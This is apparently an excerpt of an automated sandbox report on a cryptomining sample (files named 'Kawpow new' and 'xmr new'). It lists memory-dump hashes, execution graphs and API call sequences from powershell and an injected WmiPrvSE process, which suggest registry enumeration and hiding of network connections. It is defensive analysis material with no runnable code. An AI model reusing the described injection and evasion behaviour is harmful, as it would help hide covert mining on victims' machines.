                                                  • Opcode Fuzzy Hash: 883135dd36df111b2e6eda8a633d71225cad5da70766c52b8a9ba2ae64c46bb8
                                                  • Instruction Fuzzy Hash: DDD067319051098BCB09ABB4E85A5BEBB74FB14301F4041ADD917525D5EA316A6BCAC1
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 458625ea3d41b1d64a898b52dfa03bbb8533c79db8c1afce9f8a45c3902b243c
                                                  • Instruction ID: 6cce814fc30f66e55ae3cd72b21c1f912916137868d29a9c3c2e89de3c8795e5
                                                  • Opcode Fuzzy Hash: 458625ea3d41b1d64a898b52dfa03bbb8533c79db8c1afce9f8a45c3902b243c
                                                  • Instruction Fuzzy Hash: 1AC012340457898F93176B7A94004247B5CAA426163490894E4090B2639A26A951CE51
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 85f32b6cca76810f1d35868a1f7cf90fdd8f09bc8bccfc109dd95e9a18179a8c
                                                  • Instruction ID: 6b17810a8360d973e7dcd779bd96a0cf3dad91a5e7804ad389a7498d365c488f
                                                  • Opcode Fuzzy Hash: 85f32b6cca76810f1d35868a1f7cf90fdd8f09bc8bccfc109dd95e9a18179a8c
                                                  • Instruction Fuzzy Hash: 6EC08C2250C3C40FEF0BDB308A500663F315A4314034B80EB80C1CB0A3C92A0C0FCB12
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8e1d07601a4d1ea052468796de8d4f110c7bc07a45c6c95048bdd0d7c020ae98
                                                  • Instruction ID: 6a3145c8722f36749589bbc00078c26cefe12f704507357d93bf0b62515c29a7
                                                  • Opcode Fuzzy Hash: 8e1d07601a4d1ea052468796de8d4f110c7bc07a45c6c95048bdd0d7c020ae98
                                                  • Instruction Fuzzy Hash: 9FB092300847098FC2096F76A404829B32DBB4120A78408A8E40A0B2A78E37E850CA44
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2165886534.0000000007E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_7e50000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: foq$84<l$84<l$`Qjq$`Qjq$`Qjq$`Qjq$tPjq$tPjq$$jq$$jq$$jq$$jq$$jq$$jq$$jq
                                                  • API String ID: 0-2508906846
                                                  • Opcode ID: 26d3592a53582bf80f7f7f9701c0395d193b0be3b1337fe4dce02a3153fc94fa
                                                  • Instruction ID: 9713c8a1e370e7337aa67fdfcc86fb1bbfea1a129cb73a574a09498a8be3f33f
                                                  • Opcode Fuzzy Hash: 26d3592a53582bf80f7f7f9701c0395d193b0be3b1337fe4dce02a3153fc94fa
                                                  • Instruction Fuzzy Hash: BEB101B574220ECFCB24DE68C950BAB7BE6EF85305F149465EC019B290CB35DC91CBA1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2165886534.0000000007E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_7e50000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'jq$4'jq$tPjq$tPjq$$jq$$jq$$jq$$jq$4l$4l
                                                  • API String ID: 0-937335165
                                                  • Opcode ID: 45fe00e28c4df82917e46837eb80e70a7498c2505cdfcfde4f94778cdbe13dcc
                                                  • Instruction ID: f21601015c897ac57ca4818590b9b90684cf24dcdb8d21228ea1e574a9e65290
                                                  • Opcode Fuzzy Hash: 45fe00e28c4df82917e46837eb80e70a7498c2505cdfcfde4f94778cdbe13dcc
                                                  • Instruction Fuzzy Hash: FFA17CB67063198FC7119A69C8107A7BBE6EFC6298F14846BDD05CB392CA35CC85C7A1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2165886534.0000000007E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_7e50000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'jq$4'jq$$jq$$jq$$jq$4l$4l
                                                  • API String ID: 0-1950125027
                                                  • Opcode ID: 9625b35dbd4a0399dc6462d064e6ea82eff1578f626489f94325a0b92331be69
                                                  • Instruction ID: af07db4c5cf1dced695c97f7d40fb47c4aca733f26428fb38a7526be717d5b0e
                                                  • Opcode Fuzzy Hash: 9625b35dbd4a0399dc6462d064e6ea82eff1578f626489f94325a0b92331be69
                                                  • Instruction Fuzzy Hash: F9516EF5B0630E9FCB254A698410367BBA6EFC629DF24806FDD05CB291DB35C885C761
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: tM>l$`kq$`kq$`kq$`kq
                                                  • API String ID: 0-238216489
                                                  • Opcode ID: 8bb9862e8f4ae43235708150b0b7956ccf561dc1f81289bb652241338164e2fa
                                                  • Instruction ID: b51227659139c2ff3075075481a2f0aecf529ed18e8fe6f2ec7ec31020e1af56
                                                  • Opcode Fuzzy Hash: 8bb9862e8f4ae43235708150b0b7956ccf561dc1f81289bb652241338164e2fa
                                                  • Instruction Fuzzy Hash: C7B17274E003099FDB54DFA9D580A9EBBF5FF48300F20862AD419AB355EB34A905CF90
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2153310770.0000000004F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F90000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_4f90000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: tM>l$`kq$`kq$`kq$`kq
                                                  • API String ID: 0-238216489
                                                  • Opcode ID: 1a51c7bd3571a05e63cfa0dbb740c0a0fa3fafd479ade1d6b3790c795f3c6eee
                                                  • Instruction ID: f469c80fbb0f2fc90e2a1dc97f3f1354089addaa38834b2d9c5471d18ed3eb33
                                                  • Opcode Fuzzy Hash: 1a51c7bd3571a05e63cfa0dbb740c0a0fa3fafd479ade1d6b3790c795f3c6eee
                                                  • Instruction Fuzzy Hash: 5CB15274E002099FDB54DFA9D580A9EFBF6FF48300F20862AD419AB355E734A945CF90
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2165886534.0000000007E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_7e50000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $jq$$jq$$jq$$jq
                                                  • API String ID: 0-2428501249
                                                  • Opcode ID: a1d6d574ea1159ec09f8e18fc97777b7fefd5e716f22d37a810bdd0785f8f659
                                                  • Instruction ID: 4148f050284fbaa35927f59e2da98a2e9c5449a3c7e9833a98ec22bcdc1c757e
                                                  • Opcode Fuzzy Hash: a1d6d574ea1159ec09f8e18fc97777b7fefd5e716f22d37a810bdd0785f8f659
                                                  • Instruction Fuzzy Hash: C02132B231231A9BDB24596A884076BBBDBABC1715F24843AED058B291DD36C8918361
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2165886534.0000000007E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_7e50000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: tPjq$tPjq$J?l$J?l
                                                  • API String ID: 0-3664001540
                                                  • Opcode ID: 3259e05993622f0e5906e52ae1fe156fb78dd918d6a574fe691d7231a49edbcb
                                                  • Instruction ID: 28c5f71f4635b60135d510d679d8e1bd3ccce8e71ff72c8bf0c113f312e5bf4f
                                                  • Opcode Fuzzy Hash: 3259e05993622f0e5906e52ae1fe156fb78dd918d6a574fe691d7231a49edbcb
                                                  • Instruction Fuzzy Hash: 8A0147B1B4220D4FDB20465498107A7FB69EF86308F144153CF008F282CB368C52C3B1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000007.00000002.2165886534.0000000007E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07E50000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_7_2_7e50000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 4'jq$4'jq$$jq$$jq
                                                  • API String ID: 0-1496060811
                                                  • Opcode ID: 762e0d8a68433b59f474a8c2ed1a3bbfa5480b5aace9fb13667f0a669596b080
                                                  • Instruction ID: 5f0cffeb4efb903ac1dd690dda0eb28ad1ca5bace26d47e1a0cd231d7e3b5391
                                                  • Opcode Fuzzy Hash: 762e0d8a68433b59f474a8c2ed1a3bbfa5480b5aace9fb13667f0a669596b080
                                                  • Instruction Fuzzy Hash: C001F9A178F7594FC32B123858201A6AFB76F8365072941DBDC41DF3E2CD194D0687AB
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2232768142.00007FF6CDC41000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF6CDC40000, based on PE: true
                                                  • Associated: 00000009.00000002.2232692595.00007FF6CDC40000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000009.00000002.2232993961.00007FF6CDC4C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000009.00000002.2233823594.00007FF6CDC4F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000009.00000002.2234486712.00007FF6CDC50000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000009.00000002.2237327335.00007FF6CE144000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                  • Associated: 00000009.00000002.2237421637.00007FF6CE17C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_7ff6cdc40000_Kawpow new.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                                                  • Instruction ID: 63698d662ad47af922e19bdd0c1de9e70d2bbb38baff523db93e89d32ac5b0ce
                                                  • Opcode Fuzzy Hash: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                                                  • Instruction Fuzzy Hash: D1B01231F0430985E3002F01D84137832746B08742F400031C69C43362DE7D54424B10
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2235861108.00007FF7B6151000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7B6150000, based on PE: true
                                                  • Associated: 0000000C.00000002.2235707034.00007FF7B6150000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                  • Associated: 0000000C.00000002.2236068311.00007FF7B615C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                  • Associated: 0000000C.00000002.2236145532.00007FF7B615F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                  • Associated: 0000000C.00000002.2236232364.00007FF7B6160000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                  • Associated: 0000000C.00000002.2237814066.00007FF7B6654000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                  • Associated: 0000000C.00000002.2237891781.00007FF7B668C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_7ff7b6150000_xmr new.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                                                  • Instruction ID: 54eca9e30dffe8e5fbbd2e0a297d97d4cd5d8b4e0cc59a6ff874bb3074f9a7b5
                                                  • Opcode Fuzzy Hash: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                                                  • Instruction Fuzzy Hash: 94B0927490420D84E2013F2DEC8225AA2606B2A740F8004A1C70C0235ACA6D50408B20

                                                  Execution Graph

                                                  Execution Coverage:0.7%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:81
                                                  Total number of Limit Nodes:2
                                                  execution_graph 14877 1f43c51273c 14879 1f43c51276a 14877->14879 14878 1f43c512858 LoadLibraryA 14878->14879 14879->14878 14880 1f43c5128d4 14879->14880 14881 1f43c541abc 14887 1f43c541628 GetProcessHeap 14881->14887 14883 1f43c541ad2 Sleep SleepEx 14885 1f43c541acb 14883->14885 14885->14883 14886 1f43c541598 StrCmpIW StrCmpW 14885->14886 14932 1f43c5418b4 14885->14932 14886->14885 14888 1f43c541648 __std_exception_copy 14887->14888 14949 1f43c541268 GetProcessHeap 14888->14949 14890 1f43c541650 14891 1f43c541268 2 API calls 14890->14891 14892 1f43c541661 14891->14892 14893 1f43c541268 2 API calls 14892->14893 14894 1f43c54166a 14893->14894 14895 1f43c541268 2 API calls 14894->14895 14896 1f43c541673 14895->14896 14897 1f43c54168e RegOpenKeyExW 14896->14897 14898 1f43c5418a6 14897->14898 14899 1f43c5416c0 RegOpenKeyExW 14897->14899 14898->14885 14900 1f43c5416e9 14899->14900 14901 1f43c5416ff RegOpenKeyExW 14899->14901 14953 1f43c5412bc RegQueryInfoKeyW 14900->14953 14903 1f43c54173a RegOpenKeyExW 14901->14903 14904 1f43c541723 14901->14904 14905 1f43c541775 RegOpenKeyExW 14903->14905 14906 1f43c54175e 14903->14906 14964 1f43c54104c RegQueryInfoKeyW 14904->14964 14910 1f43c541799 14905->14910 14911 1f43c5417b0 RegOpenKeyExW 14905->14911 14909 1f43c5412bc 11 API calls 14906->14909 14907 1f43c5416f5 RegCloseKey 14907->14901 14913 1f43c54176b RegCloseKey 14909->14913 14914 1f43c5412bc 11 API calls 14910->14914 14915 1f43c5417eb RegOpenKeyExW 14911->14915 14916 1f43c5417d4 14911->14916 14913->14905 14917 1f43c5417a6 RegCloseKey 14914->14917 14919 1f43c541826 RegOpenKeyExW 14915->14919 14920 1f43c54180f 14915->14920 14918 1f43c5412bc 11 API calls 14916->14918 14917->14911 14923 1f43c5417e1 RegCloseKey 14918->14923 14921 1f43c54184a 14919->14921 14922 1f43c541861 RegOpenKeyExW 14919->14922 14924 1f43c54104c 4 API calls 14920->14924 14925 1f43c54104c 4 API calls 14921->14925 14926 1f43c541885 14922->14926 14927 1f43c54189c RegCloseKey 14922->14927 14923->14915 14928 1f43c54181c RegCloseKey 14924->14928 14929 1f43c541857 RegCloseKey 14925->14929 14930 1f43c54104c 4 API calls 14926->14930 14927->14898 14928->14919 14929->14922 14931 1f43c541892 RegCloseKey 14930->14931 14931->14927 14976 1f43c5414a4 14932->14976 14970 1f43c556168 14949->14970 14951 1f43c541283 GetProcessHeap 14952 1f43c5412ae __std_exception_copy 14951->14952 14952->14890 14954 1f43c54148a Concurrency::details::SchedulerProxy::DeleteThis 14953->14954 14955 1f43c541327 GetProcessHeap 14953->14955 14954->14907 14958 1f43c54133e __std_exception_copy Concurrency::details::SchedulerProxy::DeleteThis 14955->14958 14956 1f43c541476 GetProcessHeap 14956->14954 14957 1f43c541352 RegEnumValueW 14957->14958 14958->14956 14958->14957 14960 1f43c5413d3 GetProcessHeap 14958->14960 14961 1f43c54141e lstrlenW GetProcessHeap 14958->14961 14962 1f43c5413f3 GetProcessHeap 14958->14962 14963 1f43c541443 StrCpyW 14958->14963 14971 1f43c54152c 14958->14971 14960->14958 14961->14958 14962->14958 14963->14958 14965 1f43c5411b5 RegCloseKey 14964->14965 14967 1f43c5410bf __std_exception_copy Concurrency::details::SchedulerProxy::DeleteThis 14964->14967 14965->14903 14966 1f43c5410cf RegEnumValueW 14966->14967 14967->14965 14967->14966 14968 1f43c54114e GetProcessHeap 14967->14968 14969 1f43c54116e GetProcessHeap 14967->14969 14968->14967 14969->14967 14972 1f43c54157c 14971->14972 14975 1f43c541546 14971->14975 14972->14958 14973 1f43c541565 StrCmpW 14973->14975 14974 1f43c54155d StrCmpIW 14974->14975 14975->14972 14975->14973 14975->14974 14977 1f43c5414e1 GetProcessHeap 14976->14977 14978 1f43c5414c1 GetProcessHeap 14976->14978 14982 1f43c556180 14977->14982 14979 1f43c5414da Concurrency::details::SchedulerProxy::DeleteThis 14978->14979 14979->14977 14979->14978 14983 1f43c556182 14982->14983

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                  • String ID:
                                                  • API String ID: 1683269324-0
                                                  • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                  • Instruction ID: 7a4a34fefe5390c54e7c96e7146e16403cbd3c8078c9fd79adf500ccc1197042
                                                  • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                  • Instruction Fuzzy Hash: 3D115B71610E7383FB649B23F9093FB22E5BB64785FA05134AB46816B1EF7CC154C608

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 000001F43C541628: GetProcessHeap.KERNEL32 ref: 000001F43C541633
                                                    • Part of subcall function 000001F43C541628: HeapAlloc.KERNEL32 ref: 000001F43C541642
                                                    • Part of subcall function 000001F43C541628: RegOpenKeyExW.ADVAPI32 ref: 000001F43C5416B2
                                                    • Part of subcall function 000001F43C541628: RegOpenKeyExW.ADVAPI32 ref: 000001F43C5416DF
                                                    • Part of subcall function 000001F43C541628: RegCloseKey.ADVAPI32 ref: 000001F43C5416F9
                                                    • Part of subcall function 000001F43C541628: RegOpenKeyExW.ADVAPI32 ref: 000001F43C541719
                                                    • Part of subcall function 000001F43C541628: RegCloseKey.ADVAPI32 ref: 000001F43C541734
                                                    • Part of subcall function 000001F43C541628: RegOpenKeyExW.ADVAPI32 ref: 000001F43C541754
                                                    • Part of subcall function 000001F43C541628: RegCloseKey.ADVAPI32 ref: 000001F43C54176F
                                                    • Part of subcall function 000001F43C541628: RegOpenKeyExW.ADVAPI32 ref: 000001F43C54178F
                                                    • Part of subcall function 000001F43C541628: RegCloseKey.ADVAPI32 ref: 000001F43C5417AA
                                                    • Part of subcall function 000001F43C541628: RegOpenKeyExW.ADVAPI32 ref: 000001F43C5417CA
                                                  • Sleep.KERNEL32 ref: 000001F43C541AD7
                                                  • SleepEx.KERNELBASE ref: 000001F43C541ADD
                                                    • Part of subcall function 000001F43C541628: RegCloseKey.ADVAPI32 ref: 000001F43C5417E5
                                                    • Part of subcall function 000001F43C541628: RegOpenKeyExW.ADVAPI32 ref: 000001F43C541805
                                                    • Part of subcall function 000001F43C541628: RegCloseKey.ADVAPI32 ref: 000001F43C541820
                                                    • Part of subcall function 000001F43C541628: RegOpenKeyExW.ADVAPI32 ref: 000001F43C541840
                                                    • Part of subcall function 000001F43C541628: RegCloseKey.ADVAPI32 ref: 000001F43C54185B
                                                    • Part of subcall function 000001F43C541628: RegOpenKeyExW.ADVAPI32 ref: 000001F43C54187B
                                                    • Part of subcall function 000001F43C541628: RegCloseKey.ADVAPI32 ref: 000001F43C541896
                                                    • Part of subcall function 000001F43C541628: RegCloseKey.ADVAPI32 ref: 000001F43C5418A0
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: CloseOpen$HeapSleep$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1534210851-0
                                                  • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                  • Instruction ID: 0abf03ab2f68e5925787b9756edb314a7711eee1de889495ec12e96c467ada5b
                                                  • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                  • Instruction Fuzzy Hash: E331CA71220E7393FB549B27DA413FB23E5BB84BC4F2454319F0A876A6EE26C851C618

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3086954633.000001F43C510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F43C510000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c510000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                  • Instruction ID: 3255344ca52122ba61ac838147999ebd10dfdadb2564b398ca798c600e38fa22
                                                  • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                  • Instruction Fuzzy Hash: BC610336B01AB587EF548F1A98447BEB3D2F754B98F188131DF6907788DA38E892C704

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 365 1f43c542b2c-1f43c542ba5 call 1f43c562ce0 368 1f43c542bab-1f43c542bb1 365->368 369 1f43c542ee0-1f43c542f03 365->369 368->369 370 1f43c542bb7-1f43c542bba 368->370 370->369 371 1f43c542bc0-1f43c542bc3 370->371 371->369 372 1f43c542bc9-1f43c542bd9 GetModuleHandleA 371->372 373 1f43c542bdb-1f43c542beb call 1f43c556090 372->373 374 1f43c542bed 372->374 376 1f43c542bf0-1f43c542c0e 373->376 374->376 376->369 379 1f43c542c14-1f43c542c33 StrCmpNIW 376->379 379->369 380 1f43c542c39-1f43c542c3d 379->380 380->369 381 1f43c542c43-1f43c542c4d 380->381 381->369 382 1f43c542c53-1f43c542c5a 381->382 382->369 383 1f43c542c60-1f43c542c73 382->383 384 1f43c542c75-1f43c542c81 383->384 385 1f43c542c83 383->385 386 1f43c542c86-1f43c542c8a 384->386 385->386 387 1f43c542c9a 386->387 388 1f43c542c8c-1f43c542c98 386->388 389 1f43c542c9d-1f43c542ca7 387->389 388->389 390 1f43c542d9d-1f43c542da1 389->390 391 1f43c542cad-1f43c542cb0 389->391 394 1f43c542da7-1f43c542daa 390->394 395 1f43c542ed2-1f43c542eda 390->395 392 1f43c542cc2-1f43c542ccc 391->392 393 1f43c542cb2-1f43c542cbf call 1f43c54199c 391->393 399 1f43c542d00-1f43c542d0a 392->399 400 1f43c542cce-1f43c542cdb 392->400 393->392 396 1f43c542dbb-1f43c542dc5 394->396 397 1f43c542dac-1f43c542db8 call 1f43c54199c 394->397 395->369 395->383 402 1f43c542df5-1f43c542df8 396->402 403 1f43c542dc7-1f43c542dd4 396->403 397->396 406 1f43c542d3a-1f43c542d3d 399->406 407 1f43c542d0c-1f43c542d19 399->407 400->399 405 1f43c542cdd-1f43c542cea 400->405 412 1f43c542dfa-1f43c542e03 call 1f43c541bbc 402->412 413 1f43c542e05-1f43c542e12 lstrlenW 402->413 403->402 411 1f43c542dd6-1f43c542de3 403->411 414 1f43c542ced-1f43c542cf3 405->414 409 1f43c542d4b-1f43c542d58 lstrlenW 406->409 410 1f43c542d3f-1f43c542d49 call 1f43c541bbc 406->410 407->406 415 1f43c542d1b-1f43c542d28 407->415 417 1f43c542d5a-1f43c542d64 409->417 418 1f43c542d7b-1f43c542d8d call 1f43c543844 409->418 410->409 422 1f43c542d93-1f43c542d98 410->422 419 1f43c542de6-1f43c542dec 411->419 412->413 430 1f43c542e4a-1f43c542e55 412->430 423 1f43c542e14-1f43c542e1e 413->423 424 1f43c542e35-1f43c542e3f call 1f43c543844 413->424 421 1f43c542cf9-1f43c542cfe 414->421 414->422 425 1f43c542d2b-1f43c542d31 415->425 417->418 429 1f43c542d66-1f43c542d79 call 1f43c54152c 417->429 418->422 434 1f43c542e42-1f43c542e44 418->434 419->430 431 1f43c542dee-1f43c542df3 419->431 421->399 421->414 422->434 423->424 435 1f43c542e20-1f43c542e33 call 1f43c54152c 423->435 424->434 425->422 426 1f43c542d33-1f43c542d38 425->426 426->406 426->425 429->418 429->422 437 1f43c542e57-1f43c542e5b 430->437 438 1f43c542ecc-1f43c542ed0 430->438 431->402 431->419 434->395 434->430 435->424 435->430 443 1f43c542e63-1f43c542e7d call 1f43c5485c0 437->443 444 1f43c542e5d-1f43c542e61 437->444 438->395 446 1f43c542e80-1f43c542e83 443->446 444->443 444->446 449 1f43c542e85-1f43c542ea3 call 1f43c5485c0 446->449 450 1f43c542ea6-1f43c542ea9 446->450 449->450 450->438 451 1f43c542eab-1f43c542ec9 call 1f43c5485c0 450->451 451->438
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                  • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                  • API String ID: 2119608203-3850299575
                                                  • Opcode ID: cc1c2f5be02bb854c6362e19e3c2d8aa9963211729cf9709ea9c23d7fce6e41e
                                                  • Instruction ID: 2d07b1bdf7fbbcaae019e956a200241762f985a54625f4d66ede3567c0a2b61a
                                                  • Opcode Fuzzy Hash: cc1c2f5be02bb854c6362e19e3c2d8aa9963211729cf9709ea9c23d7fce6e41e
                                                  • Instruction Fuzzy Hash: 6AB16A72210EB283FB688F26D8407FA63E5FB54B88F645026EF0993B94DE35D851C748
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 3140674995-0
                                                  • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                  • Instruction ID: 3efdc8950caeebca5da5f2a5077092a8534b3e008cb0160dbd81bc5253e3100e
                                                  • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                  • Instruction Fuzzy Hash: B7311972215EA18AFB609F61E8807EE73A4F784744F54442ADB4E57B98EF38C648CB14
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 1239891234-0
                                                  • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                  • Instruction ID: 9917a62ab3396ef01ab459de179ff39ca369291c2b59d8dcf5e986ca99f956fd
                                                  • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                  • Instruction Fuzzy Hash: C5314932214FA186EB609F26E8403EE73A4F789794F610126EB9E43B99DF38C555CB04

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000F.00000002.3087016445.000001F43C540000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001F43C540000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_15_2_1f43c540000_WmiPrvSE.jbxd
                                                  Similarity
                                                  • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
